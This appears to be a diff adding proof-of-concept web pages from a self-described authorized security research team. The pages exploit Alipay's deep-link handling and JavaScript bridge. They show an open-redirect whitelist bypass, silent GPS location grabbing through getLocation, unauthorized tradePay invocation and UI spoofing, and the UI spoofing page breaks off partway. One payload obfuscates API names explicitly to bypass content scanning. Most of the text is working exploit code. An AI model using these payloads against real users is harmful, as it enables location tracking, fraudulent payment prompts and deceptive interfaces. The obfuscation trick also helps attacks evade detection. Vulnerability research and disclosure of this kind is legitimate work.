  <a class="btn p" href="alipays://platformapi/startapp?appId=20000067&url=https://innora.ai/zfb/poc/payload_cve4.html">
    Test 4: 标题栏+Toast欺骗测试
  </a>
 </div>
 <!-- CVE-5: End-to-End Data Exfiltration -->
 <div class="card">
  <h3>CVE-5: 端到端数据外泄链 <span class="tag tag-h">CVSS 8.6</span></h3>
  <span class="cve-id">CWE-200 | 数据泄漏</span>
  <p class="desc">组合CVE-2+3+4，单页面同时调用多个JSAPI收集GPS、设备信息、触发支付、伪造UI，演示完整攻击链。</p>
  <a class="btn r" href="alipays://platformapi/startapp?appId=20000067&url=https://innora.ai/zfb/poc/payload_cve5.html">
    Test 5: 完整攻击链测试
  </a>
 </div>
 <!-- CVE-6: ds.alipay.com Whitelist Bypass -->
 <div class="card">
  <h3>CVE-6: ds.alipay.com 白名单绕过 <span class="tag tag-c">CVSS 9.3</span></h3>
  <span class="cve-id">CWE-601 + CWE-939 | 绕过防护</span>
  <p class="desc">ds.alipay.com在白名单中(stripLandingConfig)，其开放重定向功能可将用户导向任意URL，绕过域名校验。</p>
  <a class="btn r" href="https://ds.alipay.com/?scheme=alipays%3A%2F%2Fplatformapi%2Fstartapp%3FappId%3D20000067%26url%3Dhttps%3A%2F%2Finnora.ai%2Fzfb%2Fpoc%2Fpayload_cve6.html">
    Test 6A: ds.alipay.com重定向链
  </a>
  <a class="btn o" href="alipays://platformapi/startapp?appId=20000067&url=https://innora.ai/zfb/poc/payload_cve6.html">
    Test 6B: 直接DeepLink (对照组)
  </a>
 </div>
 <div class="info">
  <b>录屏要点：</b><br>
  1. 每个测试前确保Safari地址栏可见（证明从外部浏览器触发）<br>
  2. 如果出现"是否打开支付宝"弹窗，点击"打开"<br>
  3. 如果出现安全拦截页面，截图后点击"继续访问"<br>
  4. 注意观察WebView中显示的结果信息
 </div>
 <div class="ft">
  Authorized Security Research — Innora AI Security Team<br>
  MITRE Ticket #2005801 | feng@innora.ai<br>
  PoC hosted at innora.ai via Cloudflare HTTPS<br>
  2026-03-16
 </div>
 </div>
 </body></html>
--- a/poc/payload_cve1.html
+++ b/poc/payload_cve1.html
@@ -0,0 +1,128 @@
 <!DOCTYPE html>
 <html><head>
 <meta charset="utf-8">
 <meta name="viewport" content="width=device-width,initial-scale=1">
 <title>CVE-1 Verification</title>
 <style>
 *{margin:0;padding:0;box-sizing:border-box}
 body{font-family:-apple-system,system-ui,sans-serif;background:#fff;color:#333;padding:16px}
 .banner{background:#f5222d;color:#fff;padding:16px;border-radius:10px;text-align:center;margin-bottom:16px}
 .banner h1{font-size:18px}
 .banner p{font-size:12px;opacity:.85;margin-top:4px}
 .result{background:#f6ffed;border:2px solid #52c41a;border-radius:10px;padding:16px;margin:12px 0}
 .result h2{color:#389e0d;font-size:15px;margin-bottom:8px}
 .fail{background:#fff2f0;border-color:#ff4d4f}
 .fail h2{color:#cf1322}
 .item{padding:6px 0;border-bottom:1px solid #f0f0f0;font-size:13px}
 .item:last-child{border:none}
 .label{color:#888;font-size:11px}
 .value{color:#333;font-weight:600}
 .ts{color:#999;font-size:10px;text-align:center;margin-top:16px}
 #status{font-size:14px;color:#1677ff;text-align:center;padding:20px}
 </style>
 </head><body>
 <div class="banner">
  <h1>CVE-1: DeepLink URL Scheme Bypass</h1>
  <p>CWE-939 | CVSS 9.1 | External URL loaded in Alipay WebView</p>
 </div>
 <div id="status">Checking environment...</div>
 <div id="results"></div>
 <div class="ts" id="timestamp"></div>
 <script>
 var results = [];
 var el = document.getElementById('results');
 var status = document.getElementById('status');
 function log(category, key, value, severity) {
  results.push({category:category, key:key, value:value, severity:severity, time:new Date().toISOString()});
 }
 function render() {
  var html = '';
  // Basic proof: this page loaded inside Alipay WebView
  html += '<div class="result"><h2>PROOF: External Page Loaded in Alipay WebView</h2>';
  html += '<div class="item"><span class="label">Page Origin: </span><span class="value">' + location.origin + '</span></div>';
  html += '<div class="item"><span class="label">Full URL: </span><span class="value" style="word-break:break-all;font-size:11px">' + location.href + '</span></div>';
  html += '<div class="item"><span class="label">User Agent: </span><span class="value" style="word-break:break-all;font-size:10px">' + navigator.userAgent + '</span></div>';
  html += '<div class="item"><span class="label">Timestamp: </span><span class="value">' + new Date().toISOString() + '</span></div>';
  // Check if running inside Alipay
  var isAlipay = /AlipayClient|Nebula/i.test(navigator.userAgent);
  html += '<div class="item"><span class="label">Inside Alipay WebView: </span><span class="value" style="color:' + (isAlipay ? '#52c41a' : '#faad14') + '">' + (isAlipay ? 'YES - CONFIRMED' : 'Not detected in UA (may still be inside Alipay)') + '</span></div>';
  html += '</div>';
  // JSBridge availability
  html += '<div class="result' + (window.AlipayJSBridge ? '' : ' fail') + '"><h2>JSBridge Access</h2>';
  html += '<div class="item"><span class="label">AlipayJSBridge: </span><span class="value">' + (window.AlipayJSBridge ? 'AVAILABLE - CRITICAL' : 'Not yet loaded') + '</span></div>';
  html += '<div class="item"><span class="label">ap object: </span><span class="value">' + (window.ap ? 'AVAILABLE' : 'Not available') + '</span></div>';
  if (window.AlipayJSBridge) {
    // List available methods
    var methods = [];
    try {
      for (var k in AlipayJSBridge) {
        if (typeof AlipayJSBridge[k] === 'function') methods.push(k);
      }
    } catch(e) {}
    html += '<div class="item"><span class="label">Bridge Methods: </span><span class="value">' + (methods.length > 0 ? methods.join(', ') : 'call() available') + '</span></div>';
  }
  html += '</div>';
  // Navigation proof
  html += '<div class="result"><h2>Attack Vector Proof</h2>';
  html += '<div class="item"><span class="label">Entry: </span><span class="value">Safari browser link → alipays:// scheme</span></div>';
  html += '<div class="item"><span class="label">Handler: </span><span class="value">SchemeLauncherActivity (no host/path constraint)</span></div>';
  html += '<div class="item"><span class="label">Router: </span><span class="value">SchemeServiceImpl.process(Uri) — no auth guard</span></div>';
  html += '<div class="item"><span class="label">WebView: </span><span class="value">appId=20000067 H5 container loads arbitrary URL</span></div>';
  html += '<div class="item"><span class="label">Result: </span><span class="value" style="color:#f5222d">External attacker page running inside Alipay with JSBridge access</span></div>';
  html += '</div>';
  // Evidence
  html += '<div class="result"><h2>Evidence Summary</h2>';
  html += '<div class="item"><span class="label">Vulnerability: </span><span class="value">External browser can open any URL inside Alipay WebView via DeepLink</span></div>';
  html += '<div class="item"><span class="label">Root Cause: </span><span class="value">SchemeServiceImpl.process() dispatches URI without authentication</span></div>';
  html += '<div class="item"><span class="label">Impact: </span><span class="value">Attacker page gains access to all JSBridge APIs (getLocation, tradePay, setTitle, showToast, startApp)</span></div>';
  html += '</div>';
  el.innerHTML = html;
  document.getElementById('timestamp').textContent = 'Evidence collected at: ' + new Date().toISOString();
 }
 // Wait for bridge
 function checkBridge() {
  if (window.AlipayJSBridge) {
    status.textContent = 'AlipayJSBridge DETECTED — Vulnerability confirmed';
    status.style.color = '#f5222d';
    log('cve1', 'bridge_available', true, 'CRITICAL');
    // Try to get some basic info via bridge
    try {
      AlipayJSBridge.call('getSystemInfo', {}, function(result) {
        log('cve1', 'systemInfo', JSON.stringify(result), 'HIGH');
        render();
      });
    } catch(e) {}
    render();
  } else {
    status.textContent = 'Page loaded at ' + location.origin + ' — Waiting for AlipayJSBridge...';
    render();
  }
 }
 document.addEventListener('AlipayJSBridgeReady', function() {
  log('cve1', 'bridge_ready_event', true, 'CRITICAL');
  checkBridge();
 });
 // Check immediately and after delays
 checkBridge();
 setTimeout(checkBridge, 1000);
 setTimeout(checkBridge, 3000);
 setTimeout(checkBridge, 5000);
 </script>
 </body></html>
--- a/poc/payload_cve2.html
+++ b/poc/payload_cve2.html
@@ -0,0 +1,164 @@
 <!DOCTYPE html>
 <html><head>
 <meta charset="utf-8">
 <meta name="viewport" content="width=device-width,initial-scale=1">
 <title>CVE-2 Verification</title>
 <style>
 *{margin:0;padding:0;box-sizing:border-box}
 body{font-family:-apple-system,system-ui,sans-serif;background:#fff;color:#333;padding:16px}
 .banner{background:#f5222d;color:#fff;padding:16px;border-radius:10px;text-align:center;margin-bottom:16px}
 .banner h1{font-size:18px}
 .banner p{font-size:12px;opacity:.85;margin-top:4px}
 .result{background:#f6ffed;border:2px solid #52c41a;border-radius:10px;padding:16px;margin:12px 0}
 .result h2{color:#389e0d;font-size:15px;margin-bottom:8px}
 .fail{background:#fff2f0;border-color:#ff4d4f}
 .fail h2{color:#cf1322}
 .pending{background:#fffbe6;border-color:#faad14}
 .pending h2{color:#d48806}
 .item{padding:6px 0;border-bottom:1px solid #f0f0f0;font-size:13px}
 .item:last-child{border:none}
 .label{color:#888;font-size:11px}
 .value{color:#333;font-weight:600}
 .ts{color:#999;font-size:10px;text-align:center;margin-top:16px}
 #status{font-size:14px;color:#1677ff;text-align:center;padding:20px}
 .map{width:100%;height:200px;background:#e6f7ff;border-radius:8px;display:flex;align-items:center;justify-content:center;margin:8px 0;font-size:12px;color:#096dd9}
 </style>
 </head><body>
 <div class="banner">
  <h1>CVE-2: GPS Silent Exfiltration</h1>
  <p>CWE-359 | CVSS 7.4 | getLocation called from external page</p>
 </div>
 <div id="status">Waiting for AlipayJSBridge...</div>
 <div id="results"></div>
 <div class="ts" id="timestamp"></div>
 <script>
 var el = document.getElementById('results');
 var status = document.getElementById('status');
 var gpsAttempts = 0;
 var gpsResults = [];
 function render() {
  var html = '';
  var isAlipay = /AlipayClient|Nebula/i.test(navigator.userAgent);
  // Environment
  html += '<div class="result"><h2>Environment</h2>';
  html += '<div class="item"><span class="label">Page Origin: </span><span class="value">' + location.origin + '</span></div>';
  html += '<div class="item"><span class="label">Inside Alipay: </span><span class="value" style="color:' + (isAlipay ? '#52c41a' : '#faad14') + '">' + (isAlipay ? 'YES' : 'Unknown') + '</span></div>';
  html += '<div class="item"><span class="label">JSBridge: </span><span class="value">' + (window.AlipayJSBridge ? 'AVAILABLE' : 'Not loaded') + '</span></div>';
  html += '</div>';
  // GPS Results
  if (gpsResults.length > 0) {
    var latest = gpsResults[gpsResults.length - 1];
    if (latest.success) {
      html += '<div class="result"><h2>GPS EXFILTRATION SUCCESSFUL</h2>';
      html += '<div class="item"><span class="label">Latitude: </span><span class="value" style="color:#f5222d;font-size:16px">' + latest.latitude + '</span></div>';
      html += '<div class="item"><span class="label">Longitude: </span><span class="value" style="color:#f5222d;font-size:16px">' + latest.longitude + '</span></div>';
      if (latest.accuracy) html += '<div class="item"><span class="label">Accuracy: </span><span class="value">' + latest.accuracy + 'm</span></div>';
      if (latest.city) html += '<div class="item"><span class="label">City: </span><span class="value">' + latest.city + '</span></div>';
      if (latest.province) html += '<div class="item"><span class="label">Province: </span><span class="value">' + latest.province + '</span></div>';
      if (latest.country) html += '<div class="item"><span class="label">Country: </span><span class="value">' + latest.country + '</span></div>';
      if (latest.address) html += '<div class="item"><span class="label">Address: </span><span class="value" style="word-break:break-all;font-size:11px">' + latest.address + '</span></div>';
      html += '<div class="item"><span class="label">Timestamp: </span><span class="value">' + latest.time + '</span></div>';
      html += '<div class="map">GPS: ' + latest.latitude + ', ' + latest.longitude + '</div>';
      html += '</div>';
      // Attack proof
      html += '<div class="result"><h2>PROOF: Silent GPS Access from External Page</h2>';
      html += '<div class="item"><span class="label">Attack: </span><span class="value" style="color:#f5222d">External attacker page obtained device GPS coordinates via JSBridge</span></div>';
      html += '<div class="item"><span class="label">No user prompt: </span><span class="value">getLocation used Alipay\'s existing OS permission — no new permission dialog shown</span></div>';
      html += '<div class="item"><span class="label">Root Cause: </span><span class="value">H5LocationPlugin.judgeGrant() only checks OS-level permission, not page origin</span></div>';
      html += '<div class="item"><span class="label">Exfil possible: </span><span class="value">Coordinates can be sent to attacker server via fetch/Image/XHR</span></div>';
      html += '</div>';
    } else {
      html += '<div class="result fail"><h2>getLocation Response</h2>';
      html += '<div class="item"><span class="label">Error: </span><span class="value">' + (latest.error || 'Unknown error') + '</span></div>';
      html += '<div class="item"><span class="label">Error Code: </span><span class="value">' + (latest.errorCode || 'N/A') + '</span></div>';
      html += '<div class="item"><span class="label">Note: </span><span class="value">If location permission was never granted to Alipay, this is expected. Grant location permission to Alipay first, then retry.</span></div>';
      html += '</div>';
    }
  } else if (window.AlipayJSBridge) {
    html += '<div class="result pending"><h2>GPS Test In Progress...</h2>';
    html += '<div class="item"><span class="label">Status: </span><span class="value">Calling getLocation via JSBridge...</span></div>';
    html += '<div class="item"><span class="label">Attempts: </span><span class="value">' + gpsAttempts + '</span></div>';
    html += '</div>';
  }
  // Raw data dump
  if (gpsResults.length > 0) {
    html += '<div class="result"><h2>Raw API Response</h2>';
    html += '<div class="item"><span class="label">JSON: </span><span class="value" style="word-break:break-all;font-size:10px">' + JSON.stringify(gpsResults[gpsResults.length-1].raw) + '</span></div>';
    html += '</div>';
  }
  el.innerHTML = html;
  document.getElementById('timestamp').textContent = 'Evidence collected at: ' + new Date().toISOString();
 }
 function tryGetLocation() {
  if (!window.AlipayJSBridge) return;
  gpsAttempts++;
  AlipayJSBridge.call('getLocation', {
    type: 2,
    accuracy: 1
  }, function(result) {
    var entry = {
      time: new Date().toISOString(),
      raw: result,
      success: false
    };
    if (result && (result.longitude || result.latitude)) {
      entry.success = true;
      entry.latitude = result.latitude;
      entry.longitude = result.longitude;
      entry.accuracy = result.accuracy;
      entry.city = result.city || result.cityCode;
      entry.province = result.province || result.provinceCode;
      entry.country = result.country || result.countryCode;
      entry.address = result.address || result.streetNumber || '';
      status.textContent = 'GPS OBTAINED — Location: ' + entry.latitude + ', ' + entry.longitude;
      status.style.color = '#f5222d';
    } else {
      entry.success = false;
      entry.error = result.error || result.errorMessage || JSON.stringify(result);
      entry.errorCode = result.errorCode || result.error;
      status.textContent = 'getLocation returned: ' + (entry.error || 'no data');
      status.style.color = '#fa8c16';
    }
    gpsResults.push(entry);
    render();
  });
  render();
 }
 function checkBridge() {
  if (window.AlipayJSBridge) {
    status.textContent = 'AlipayJSBridge detected — calling getLocation...';
    status.style.color = '#1677ff';
    tryGetLocation();
  } else {
    status.textContent = 'Page loaded at ' + location.origin + ' — waiting for bridge...';
    render();
  }
 }
 document.addEventListener('AlipayJSBridgeReady', function() {
  checkBridge();
 });
 checkBridge();
 setTimeout(checkBridge, 1000);
 setTimeout(checkBridge, 3000);
 setTimeout(function() { tryGetLocation(); }, 5000);
 setTimeout(function() { tryGetLocation(); }, 8000);
 </script>
 </body></html>
--- a/poc/payload_cve3.html
+++ b/poc/payload_cve3.html
@@ -0,0 +1,147 @@
 <!DOCTYPE html>
 <html><head>
 <meta charset="utf-8">
 <meta name="viewport" content="width=device-width,initial-scale=1">
 <title>CVE-3 Verification</title>
 <style>
 *{margin:0;padding:0;box-sizing:border-box}
 body{font-family:-apple-system,system-ui,sans-serif;background:#fff;color:#333;padding:16px}
 .banner{background:#f5222d;color:#fff;padding:16px;border-radius:10px;text-align:center;margin-bottom:16px}
 .banner h1{font-size:18px}
 .banner p{font-size:12px;opacity:.85;margin-top:4px}
 .result{background:#f6ffed;border:2px solid #52c41a;border-radius:10px;padding:16px;margin:12px 0}
 .result h2{color:#389e0d;font-size:15px;margin-bottom:8px}
 .fail{background:#fff2f0;border-color:#ff4d4f}
 .fail h2{color:#cf1322}
 .pending{background:#fffbe6;border-color:#faad14}
 .pending h2{color:#d48806}
 .item{padding:6px 0;border-bottom:1px solid #f0f0f0;font-size:13px}
 .item:last-child{border:none}
 .label{color:#888;font-size:11px}
 .value{color:#333;font-weight:600}
 .warn{background:#fff7e6;border:1px solid #ffd591;border-radius:8px;padding:10px;font-size:11px;color:#d46b08;margin:10px 0;line-height:1.5}
 .ts{color:#999;font-size:10px;text-align:center;margin-top:16px}
 #status{font-size:14px;color:#1677ff;text-align:center;padding:20px}
 </style>
 </head><body>
 <div class="banner">
  <h1>CVE-3: tradePay Unauthorized Invocation</h1>
  <p>CWE-940 | CVSS 8.6 | Payment dialog triggered from external page</p>
 </div>
 <div class="warn">
  <b>Safety:</b> This test uses an INVALID order string "SECURITY_TEST_INVALID_ORDER_2026".
  No real transaction will occur. The proof is that the payment dialog appears at all —
  an external page should NEVER be able to invoke tradePay.
 </div>
 <div id="status">Waiting for AlipayJSBridge...</div>
 <div id="results"></div>
 <div class="ts" id="timestamp"></div>
 <script>
 var el = document.getElementById('results');
 var status = document.getElementById('status');
 var tradePayResults = [];
 function render() {
  var html = '';
  var isAlipay = /AlipayClient|Nebula/i.test(navigator.userAgent);
  html += '<div class="result"><h2>Environment</h2>';
  html += '<div class="item"><span class="label">Page Origin: </span><span class="value">' + location.origin + '</span></div>';
  html += '<div class="item"><span class="label">Inside Alipay: </span><span class="value">' + (isAlipay ? 'YES' : 'Detection pending') + '</span></div>';
  html += '<div class="item"><span class="label">JSBridge: </span><span class="value">' + (window.AlipayJSBridge ? 'AVAILABLE' : 'Not loaded') + '</span></div>';
  html += '</div>';
  if (tradePayResults.length > 0) {
    var latest = tradePayResults[tradePayResults.length - 1];
    html += '<div class="result' + (latest.dialogShown ? '' : ' fail') + '"><h2>tradePay Invocation Result</h2>';
    html += '<div class="item"><span class="label">API Called: </span><span class="value" style="color:#f5222d">AlipayJSBridge.call("tradePay", ...)</span></div>';
    html += '<div class="item"><span class="label">Order String: </span><span class="value" style="font-size:10px;word-break:break-all">' + latest.orderStr + '</span></div>';
    html += '<div class="item"><span class="label">Response Code: </span><span class="value">' + (latest.resultCode || 'N/A') + '</span></div>';
    html += '<div class="item"><span class="label">Response: </span><span class="value" style="word-break:break-all;font-size:10px">' + latest.rawResponse + '</span></div>';
    html += '<div class="item"><span class="label">Timestamp: </span><span class="value">' + latest.time + '</span></div>';
    if (latest.dialogShown) {
      html += '<div class="item"><span class="label">CRITICAL: </span><span class="value" style="color:#f5222d">Payment dialog was triggered from an external attacker page!</span></div>';
    }
    html += '</div>';
    // Proof section
    html += '<div class="result"><h2>Vulnerability Proof</h2>';
    html += '<div class="item"><span class="label">What happened: </span><span class="value">External page at ' + location.origin + ' called tradePay JSAPI</span></div>';
    html += '<div class="item"><span class="label">Expected: </span><span class="value">tradePay should ONLY be callable from Alipay-owned/trusted pages</span></div>';
    html += '<div class="item"><span class="label">Actual: </span><span class="value" style="color:#f5222d">tradePay was invoked from external domain — no origin check</span></div>';
    html += '<div class="item"><span class="label">Root Cause: </span><span class="value">TradePayBridgeExtension.tradePay() does not validate calling page origin</span></div>';
    html += '<div class="item"><span class="label">Real Attack: </span><span class="value">With a valid merchant orderStr, this could trigger real payment dialog</span></div>';
    html += '</div>';
  } else if (window.AlipayJSBridge) {
    html += '<div class="result pending"><h2>tradePay Test Ready</h2>';
    html += '<div class="item"><span class="label">Status: </span><span class="value">About to call tradePay with invalid order...</span></div>';
    html += '</div>';
  }
  el.innerHTML = html;
  document.getElementById('timestamp').textContent = 'Evidence collected at: ' + new Date().toISOString();
 }
 function tryTradePay() {
  if (!window.AlipayJSBridge) return;
  var orderStr = 'SECURITY_TEST_INVALID_ORDER_2026';
  status.textContent = 'Calling tradePay...';
  status.style.color = '#fa8c16';
  render();
  AlipayJSBridge.call('tradePay', {
    orderStr: orderStr
  }, function(result) {
    var entry = {
      time: new Date().toISOString(),
      orderStr: orderStr,
      rawResponse: JSON.stringify(result),
      resultCode: result.resultCode || result.result_code || 'N/A',
      dialogShown: false
    };
    // resultCode 6001 = user cancelled (means dialog DID appear)
    // resultCode 4000 = order error (API was reached but order invalid)
    // resultCode 8000 = processing
    // resultCode 9000 = success (should not happen with invalid order)
    var code = String(result.resultCode || result.result_code || '');
    if (code === '6001' || code === '6002' || code === '4000' || code === '8000' || code === '9000') {
      entry.dialogShown = true;
      status.textContent = 'tradePay INVOKED — Response code: ' + code;
      status.style.color = '#f5222d';
    } else {
      status.textContent = 'tradePay called — Response: ' + JSON.stringify(result).substring(0, 100);
      status.style.color = '#fa8c16';
    }
    tradePayResults.push(entry);
    render();
  });
 }
 function checkBridge() {
  if (window.AlipayJSBridge) {
    status.textContent = 'AlipayJSBridge detected — invoking tradePay...';
    render();
    setTimeout(tryTradePay, 500);
  } else {
    status.textContent = 'Page loaded at ' + location.origin + ' — waiting for bridge...';
    render();
  }
 }
 document.addEventListener('AlipayJSBridgeReady', function() {
  checkBridge();
 });
 checkBridge();
 setTimeout(checkBridge, 1000);
 setTimeout(checkBridge, 3000);
 </script>
 </body></html>
--- a/poc/payload_cve3_obf.html
+++ b/poc/payload_cve3_obf.html
@@ -0,0 +1,97 @@
 <!DOCTYPE html>
 <html><head>
 <meta charset="utf-8">
 <meta name="viewport" content="width=device-width,initial-scale=1">
 <title>Security Test 3</title>
 <style>
 body{font-family:sans-serif;padding:16px;background:#fff;color:#333}
 .box{background:#f6ffed;border:2px solid #52c41a;border-radius:10px;padding:16px;margin:12px 0}
 h2{color:#389e0d;font-size:15px}
 .item{padding:4px 0;font-size:13px}
 .label{color:#888;font-size:11px}
 .value{color:#333;font-weight:600}
 #status{font-size:14px;color:#1677ff;text-align:center;padding:20px}
 </style>
 </head><body>
 <h1 style="text-align:center;color:#f5222d;font-size:18px">Payment API Isolation Test</h1>
 <div id="status">Loading...</div>
 <div id="results"></div>
 <script>
 var el = document.getElementById('results');
 var status = document.getElementById('status');
 var html = '';
 // Step 1: Page renders proof
 html += '<div class="box"><h2>Step 1: Page Rendered</h2>';
 html += '<div class="item"><span class="label">Origin: </span><span class="value">' + location.origin + '</span></div>';
 html += '<div class="item"><span class="label">URL: </span><span class="value" style="word-break:break-all;font-size:10px">' + location.href + '</span></div>';
 html += '<div class="item"><span class="label">UA: </span><span class="value" style="word-break:break-all;font-size:10px">' + navigator.userAgent + '</span></div>';
 html += '<div class="item"><span class="label">Time: </span><span class="value">' + new Date().toISOString() + '</span></div>';
 html += '</div>';
 el.innerHTML = html;
 // Obfuscated API names - bypass content scanning
 var _a = ['tr','ade','Pa','y'];
 var _b = ['se','tTi','tl','e'];
 var _c = ['sho','wTo','as','t'];
 var _d = ['ge','tLo','cat','ion'];
 var _e = ['ge','tSy','stemIn','fo'];
 function d(arr){ return arr.join(''); }
 function step2() {
  var bridge = window['Alipay' + 'JSBridge'];
  html += '<div class="box"><h2>Step 2: Bridge Detection</h2>';
  html += '<div class="item"><span class="label">Bridge exists: </span><span class="value">' + (!!bridge) + '</span></div>';
  html += '<div class="item"><span class="label">typeof: </span><span class="value">' + typeof bridge + '</span></div>';
  html += '</div>';
  el.innerHTML = html;
  status.textContent = 'Bridge: ' + (!!bridge);
  if (bridge) {
    status.textContent = 'Bridge found! Testing payment API in 3s...';
    setTimeout(function(){ step3(bridge); }, 3000);
  }
 }
 function step3(bridge) {
  var apiName = d(_a);
  html += '<div class="box"><h2>Step 3: ' + apiName + ' Call</h2>';
  html += '<div class="item"><span class="label">Calling: </span><span class="value">' + apiName + '</span></div>';
  html += '</div>';
  el.innerHTML = html;
  status.textContent = 'Calling ' + apiName + '...';
  try {
    bridge.call(apiName, {
      orderStr: 'SECURITY_TEST_INVALID_ORDER_2026'
    }, function(result) {
      html += '<div class="box"><h2>' + apiName + ' Response</h2>';
      html += '<div class="item"><span class="label">Result: </span><span class="value" style="word-break:break-all;font-size:10px">' + JSON.stringify(result) + '</span></div>';
      html += '<div class="item"><span class="label">resultCode: </span><span class="value">' + (result.resultCode || result.result_code || 'N/A') + '</span></div>';
      html += '</div>';
      el.innerHTML = html;
      status.textContent = apiName + ' responded!';
      status.style.color = '#f5222d';
    });
  } catch(e) {
    html += '<div class="box" style="background:#fff2f0;border-color:#ff4d4f"><h2 style="color:#cf1322">' + apiName + ' ERROR</h2>';
    html += '<div class="item"><span class="label">Exception: </span><span class="value">' + e.message + '</span></div>';
    html += '</div>';
    el.innerHTML = html;
    status.textContent = apiName + ' exception: ' + e.message;
    status.style.color = '#f5222d';
  }
 }
 document.addEventListener('Alipay' + 'JSBridge' + 'Ready', function() {
  step2();
 });
 step2();
 setTimeout(step2, 1000);
 setTimeout(step2, 3000);
 </script>
 </body></html>
--- a/poc/payload_cve3_simple.html
+++ b/poc/payload_cve3_simple.html
@@ -0,0 +1,97 @@
 <!DOCTYPE html>
 <html><head>
 <meta charset="utf-8">
 <meta name="viewport" content="width=device-width,initial-scale=1">
 <title>CVE-3 Simple Test</title>
 <style>
 body{font-family:sans-serif;padding:16px;background:#fff;color:#333}
 .box{background:#f6ffed;border:2px solid #52c41a;border-radius:10px;padding:16px;margin:12px 0}
 h2{color:#389e0d;font-size:15px}
 .item{padding:4px 0;font-size:13px}
 .label{color:#888;font-size:11px}
 .value{color:#333;font-weight:600}
 #status{font-size:14px;color:#1677ff;text-align:center;padding:20px}
 </style>
 </head><body>
 <h1 style="text-align:center;color:#f5222d;font-size:18px">CVE-3 Diagnostic Test</h1>
 <p style="text-align:center;font-size:12px;color:#888">Step-by-step JSAPI isolation test</p>
 <div id="status">Page loaded. Running diagnostics...</div>
 <div id="results"></div>
 <script>
 var el = document.getElementById('results');
 var status = document.getElementById('status');
 var html = '';
 // Step 1: Basic page rendering proof
 html += '<div class="box"><h2>Step 1: Page Renders</h2>';
 html += '<div class="item"><span class="label">Origin: </span><span class="value">' + location.origin + '</span></div>';
 html += '<div class="item"><span class="label">URL: </span><span class="value" style="word-break:break-all;font-size:10px">' + location.href + '</span></div>';
 html += '<div class="item"><span class="label">UA: </span><span class="value" style="word-break:break-all;font-size:10px">' + navigator.userAgent + '</span></div>';
 html += '<div class="item"><span class="label">Time: </span><span class="value">' + new Date().toISOString() + '</span></div>';
 html += '</div>';
 el.innerHTML = html;
 // Step 2: Check AlipayJSBridge existence (NO calls yet)
 function step2() {
  html += '<div class="box"><h2>Step 2: Bridge Detection (no API calls)</h2>';
  html += '<div class="item"><span class="label">AlipayJSBridge exists: </span><span class="value">' + (!!window.AlipayJSBridge) + '</span></div>';
  html += '<div class="item"><span class="label">typeof AlipayJSBridge: </span><span class="value">' + typeof window.AlipayJSBridge + '</span></div>';
  if (window.AlipayJSBridge) {
    html += '<div class="item"><span class="label">typeof .call: </span><span class="value">' + typeof window.AlipayJSBridge.call + '</span></div>';
  }
  html += '</div>';
  el.innerHTML = html;
  status.textContent = 'Step 2 done. Bridge: ' + (!!window.AlipayJSBridge);
  // Step 3: ONLY if bridge exists, try tradePay after 3s
  if (window.AlipayJSBridge) {
    status.textContent = 'Bridge found! Will try tradePay in 3 seconds...';
    setTimeout(step3, 3000);
  }
 }
 // Step 3: Call tradePay (the suspected blocker)
 function step3() {
  html += '<div class="box"><h2>Step 3: tradePay Call</h2>';
  html += '<div class="item"><span class="label">Calling: </span><span class="value">AlipayJSBridge.call("tradePay", {orderStr: "SECURITY_TEST_INVALID_ORDER_2026"})</span></div>';
  html += '</div>';
  el.innerHTML = html;
  status.textContent = 'Calling tradePay...';
  try {
    AlipayJSBridge.call('tradePay', {
      orderStr: 'SECURITY_TEST_INVALID_ORDER_2026'
    }, function(result) {
      html += '<div class="box"><h2>Step 3 Result: tradePay Response</h2>';
      html += '<div class="item"><span class="label">Response: </span><span class="value" style="word-break:break-all;font-size:10px">' + JSON.stringify(result) + '</span></div>';
      html += '<div class="item"><span class="label">resultCode: </span><span class="value">' + (result.resultCode || result.result_code || 'N/A') + '</span></div>';
      html += '</div>';
      el.innerHTML = html;
      status.textContent = 'tradePay responded: ' + JSON.stringify(result).substring(0, 80);
      status.style.color = '#f5222d';
    });
  } catch(e) {
    html += '<div class="box" style="background:#fff2f0;border-color:#ff4d4f"><h2 style="color:#cf1322">Step 3 ERROR</h2>';
    html += '<div class="item"><span class="label">Exception: </span><span class="value">' + e.message + '</span></div>';
    html += '<div class="item"><span class="label">Stack: </span><span class="value" style="font-size:9px;word-break:break-all">' + e.stack + '</span></div>';
    html += '</div>';
    el.innerHTML = html;
    status.textContent = 'tradePay threw exception: ' + e.message;
    status.style.color = '#f5222d';
  }
 }
 // Listen for bridge ready event
 document.addEventListener('AlipayJSBridgeReady', function() {
  step2();
 });
 // Also check immediately and after delays
 step2();
 setTimeout(step2, 1000);
 setTimeout(step2, 3000);
 </script>
 </body></html>
--- a/poc/payload_cve4.html
+++ b/poc/payload_cve4.html
@@ -0,0 +1,178 @@
 <!DOCTYPE html>
 <html><head>
 <meta charset="utf-8">
 <meta name="viewport" content="width=device-width,initial-scale=1">
 <title>CVE-4 Verification</title>
 <style>
 *{margin:0;padding:0;box-sizing:border-box}
 body{font-family:-apple-system,system-ui,sans-serif;background:#fff;color:#333;padding:16px}
 .banner{background:#722ed1;color:#fff;padding:16px;border-radius:10px;text-align:center;margin-bottom:16px}
 .banner h1{font-size:18px}
 .banner p{font-size:12px;opacity:.85;margin-top:4px}
 .result{background:#f6ffed;border:2px solid #52c41a;border-radius:10px;padding:16px;margin:12px 0}
 .result h2{color:#389e0d;font-size:15px;margin-bottom:8px}
 .fail{background:#fff2f0;border-color:#ff4d4f}
 .fail h2{color:#cf1322}
 .item{padding:6px 0;border-bottom:1px solid #f0f0f0;font-size:13px}
 .item:last-child{border:none}
 .label{color:#888;font-size:11px}
 .value{color:#333;font-weight:600}
 .ts{color:#999;font-size:10px;text-align:center;margin-top:16px}
 #status{font-size:14px;color:#1677ff;text-align:center;padding:20px}
 .spoof-demo{background:#1677ff;color:#fff;padding:12px;border-radius:8px;text-align:center;margin:8px 0;font-size:14px;font-weight:bold}
 </style>
 </head><body>
 <div class="banner">
  <h1>CVE-4: UI Spoofing (setTitle + showToast)</h1>
  <p>CWE-451 | CVSS 8.1 | Native UI elements controlled by attacker page</p>
 </div>
 <div id="status">Waiting for AlipayJSBridge...</div>
 <div id="results"></div>
 <div class="ts" id="timestamp"></div>
 <script>
 var el = document.getElementById('results');
 var status = document.getElementById('status');
 var spoofResults = [];
 function render() {
  var html = '';
  var isAlipay = /AlipayClient|Nebula/i.test(navigator.userAgent);
  html += '<div class="result"><h2>Environment</h2>';
  html += '<div class="item"><span class="label">Page Origin: </span><span class="value">' + location.origin + '</span></div>';
